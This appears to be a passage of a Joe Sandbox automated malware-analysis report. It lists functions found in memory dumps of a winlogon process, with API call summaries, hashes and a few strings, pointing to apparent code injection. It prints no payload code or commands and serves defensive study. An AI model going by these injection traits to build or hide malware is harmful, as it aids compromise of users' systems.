                                                  • Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                                  • String ID:
                                                  • API String ID: 2779030803-0
                                                  • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                  • Instruction ID: 5a3ca2a828a2f69e8ddffaa21c5641dcb192bd3c096c6af3b0a23b43865aa00f
                                                  • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                  • Instruction Fuzzy Hash: FD116937E9070982FB66A722A549FE932A0BF84B4FFC000199406C11D0EF3BC58587D3

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                  • String ID:
                                                  • API String ID: 3733156554-0
                                                  • Opcode ID: 50caac35bfbc2d5f59ac81492b3b3ec34dc9555305fb9744858cadce20ffe8b5
                                                  • Instruction ID: d66c06046afa48536f3f5d6c761f082350603e171004f0d7298866914a91c0bf
                                                  • Opcode Fuzzy Hash: 50caac35bfbc2d5f59ac81492b3b3ec34dc9555305fb9744858cadce20ffe8b5
                                                  • Instruction Fuzzy Hash: BAF01237658B4880F6319B05E451B8A77A1FB887D9F544111BACD07769CA3AC580CB82

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 000001CA7D1E1724: GetProcessHeap.KERNEL32 ref: 000001CA7D1E172F
                                                    • Part of subcall function 000001CA7D1E1724: HeapAlloc.KERNEL32 ref: 000001CA7D1E173E
                                                    • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E17AE
                                                    • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E17DB
                                                    • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E17F5
                                                    • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1815
                                                    • Part of subcall function 000001CA7D1E1724: RegCloseKey.KERNELBASE ref: 000001CA7D1E1830
                                                    • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1850
                                                    • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E186B
                                                    • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E188B
                                                    • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E18A6
                                                    • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E18C6
                                                  • SleepEx.KERNELBASE ref: 000001CA7D1E1BDF
                                                    • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E18E1
                                                    • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1901
                                                    • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E191C
                                                    • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E193C
                                                    • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E1957
                                                    • Part of subcall function 000001CA7D1E1724: RegOpenKeyExW.KERNELBASE ref: 000001CA7D1E1977
                                                    • Part of subcall function 000001CA7D1E1724: RegCloseKey.ADVAPI32 ref: 000001CA7D1E1992
                                                    • Part of subcall function 000001CA7D1E1724: RegCloseKey.KERNELBASE ref: 000001CA7D1E199C
                                                  Memory Dump Source
                                                  • Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                  • String ID:
                                                  • API String ID: 948135145-0
                                                  • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                  • Instruction ID: 7242aede8837696ec19541534e1c3dce86efc3bfd9bee90a47d931ad18d557f5
                                                  • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                  • Instruction Fuzzy Hash: D5312177A8070941FB529B22E940BE933A5BF44BC9F8A44618E0AC7295EE12C4D093F7

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 408 1ca7d1ef370-1ca7d1ef39f VirtualProtect
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                  • Instruction ID: bead2ac1358e17f089f294fb4c756c1d3e3800fd4e757aed294e48ae8c095ac3
                                                  • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                  • Instruction Fuzzy Hash: 58D01236B32644C3F301DB51D855BD67729FB98705FC04005E94982694DF7DC259CF92

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 409 1ca7d21f370-1ca7d21f39f VirtualProtect
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000002A.00000002.2579209671.000001CA7D211000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D210000, based on PE: true
                                                  • Associated: 0000002A.00000002.2578132456.000001CA7D210000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2580862945.000001CA7D225000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2582107054.000001CA7D230000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2583463080.000001CA7D232000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2584654752.000001CA7D239000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_42_2_1ca7d210000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                  • Instruction ID: 96736f0284182aa4837be0ebcb41d10c413a553dbe389820e9d30482321e3cc7
                                                  • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                  • Instruction Fuzzy Hash: CFD0C936B3164483F3019B11D845BD56228BB98705FC04005E949826948F7DC25ACB92
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFile$FirstNext
                                                  • String ID:
                                                  • API String ID: 1164774033-0
                                                  • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction ID: bca9c8bf826c505011b38fd6b5f6bfe9104125b42424f6945c05f756906d2787
                                                  • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                  • Instruction Fuzzy Hash: C8A10633B4478849FB229B75E440BED7BA0BB81B9DF9C4115DA492BA95DA36C041C343
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Utilization Percentage
                                                  • API String ID: 1943346504-3507739905
                                                  • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction ID: 8eab24d6d6144954bd2ca5cd0d15ee39b50dab67e5137aa515f9043b1a9d6d94
                                                  • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                  • Instruction Fuzzy Hash: 07318433A50B4986F712DF12E854B9973E1BF84F9AF8440259E4A43724DF39D542C782
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                  • String ID: csm$csm$csm
                                                  • API String ID: 849930591-393685449
                                                  • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction ID: 9fc1314c1b3568874932ff714da4d78103fade56a62ede063e1102c62ff8e334
                                                  • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                  • Instruction Fuzzy Hash: E8D18B73A447888AFB22DF659540BDD7BA0FB4979DF900205EE8957B96CB35C480C783
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Free$CurrentThread
                                                  • String ID:
                                                  • API String ID: 564911740-0
                                                  • Opcode ID: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction ID: dd7d2fbe355015c765db1afd73c3d8f2591a8a07618d104dc6321a3fb9c50056
                                                  • Opcode Fuzzy Hash: d3c28f796396b1edcf9deeb44a5a84d122c2fcfc0f762368ef43e6e6c9edfbab
                                                  • Instruction Fuzzy Hash: 8751C372A81B4995FB07DB24D860AE433A1BF0474EFC40819A52D467A5FF7AC619C3E3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID: $rbx-
                                                  • API String ID: 756756679-3661604363
                                                  • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction ID: 53dd2015d23d3b19de732b4b8ca317527b9a6887f52f6010c9b4161ede9a8080
                                                  • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                                  • Instruction Fuzzy Hash: 2831A233B41B5982F716DF26D544AA973A0BF48F8AF8840208F4807755EF36C5A18383
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID:
                                                  • API String ID: 517849248-0
                                                  • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction ID: a292ab2cfa75126c4a735770990b9ca6806856f301d60702c71bca0c6d7b623e
                                                  • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                                  • Instruction Fuzzy Hash: B9016D32B45B8482FB11DB12E868B9973A1FB88FC8F8940349E5E43754DE3DC685C792
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
                                                  • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction ID: c63064200cc5015cd9426516bf03d8a10638c949921e829e67ac36650152cb9d
                                                  • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                                  • Instruction Fuzzy Hash: 8C012176B5274882FB269B61E458F9573B0FF44B4AF840024D94D46358EF3EC549C793
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: f37e1c6386c44249f93e7a8c8070b12ec0e492f56422c91e1d25021c4f6724ae
                                                  • Instruction ID: fa9a5d2907fee9bc4b961baced023eb20950943a2e523218285e0907ba0ddb00
                                                  • Opcode Fuzzy Hash: f37e1c6386c44249f93e7a8c8070b12ec0e492f56422c91e1d25021c4f6724ae
                                                  • Instruction Fuzzy Hash: 1F61F633969B4886F761CB15E550B9AB7E0FB88749F900115FA8D43BA8DB3EC540CB83
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 2395640692-1018135373
                                                  • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction ID: 60e8b9d452b22d8066b229c291e107fc67761e130e05b0da0dcc3cb05f5680b7
                                                  • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                  • Instruction Fuzzy Hash: 2B51E533B917888AFB59CB15E044FAC7791FB94B9DF948110EA4A47B88D77AC841C783
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction ID: 067d4f9d96a6597854837632812c8a5965103370f5823a428bd146fe93ab2a8e
                                                  • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                                  • Instruction Fuzzy Hash: 3F01AD73A45B84CAF715DF62E80458877B0FB88F85B464025DF4A43718DF35E191C382
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                  • String ID:
                                                  • API String ID: 2933794660-0
                                                  • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction ID: 2ffd8be48935f38640984e0e891f6a1c018a3ddb3dfbf4d3b2fca621978af583
                                                  • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                                  • Instruction Fuzzy Hash: 14113C36B51F088AFB00CF60E8547E833A4FB59758F840E21DA6D86BA4EF78C1558382
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction ID: 543a74f7f096710a94370db433aa404daddb7db03a989235164fc2747e9da801
                                                  • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                                  • Instruction Fuzzy Hash: 9C513837E8479841F626CE25A464BEA7791FBA8B89FD40069DD4943B89DE37C500C7C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2576429441.000001CA7D202000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2577255446.000001CA7D209000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_42_2_1ca7d1e0000_winlogon.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction ID: 168bd5042619de978051ce00469c6fab8e07dcb428ef58c1d872ee4ec8472086
                                                  • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                                  • Instruction Fuzzy Hash: A741F633A16B8886F711DF65E404BD9B7A0FB98798FC04121EE8D87758EB39C441CB82
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000002A.00000002.2573663142.000001CA7D1E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001CA7D1E0000, based on PE: true
                                                  • Associated: 0000002A.00000002.2572853621.000001CA7D1E0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2574699564.000001CA7D1F5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 0000002A.00000002.2575546910.000001CA7D200000.00000004.00000001.00020000.00000000.sdmpDownload File
